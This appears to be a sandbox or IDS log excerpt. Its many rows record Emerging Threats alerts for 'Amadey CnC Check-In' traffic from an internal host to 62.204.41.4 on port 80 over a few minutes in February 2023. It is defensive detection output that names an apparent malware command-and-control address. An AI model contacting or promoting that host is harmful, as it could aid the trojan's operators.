                          192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903TCP2027700ET TROJAN Amadey CnC Check-In5047280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322TCP2027700ET TROJAN Amadey CnC Check-In5040380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079TCP2027700ET TROJAN Amadey CnC Check-In5047180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414TCP2027700ET TROJAN Amadey CnC Check-In5041080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946TCP2027700ET TROJAN Amadey CnC Check-In5038880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120TCP2027700ET TROJAN Amadey CnC Check-In5048180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270TCP2027700ET TROJAN Amadey CnC Check-In5039880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077TCP2027700ET TROJAN Amadey CnC Check-In5040080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090TCP2027700ET TROJAN Amadey CnC Check-In5039380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630TCP2027700ET TROJAN Amadey CnC Check-In5044380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226TCP2027700ET TROJAN Amadey CnC Check-In5047480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097TCP2027700ET TROJAN Amadey CnC Check-In5040580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630TCP2027700ET TROJAN Amadey CnC Check-In5037580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971TCP2027700ET TROJAN Amadey CnC Check-In5043680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488TCP2027700ET TROJAN Amadey CnC Check-In5043380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.662.204.41.4
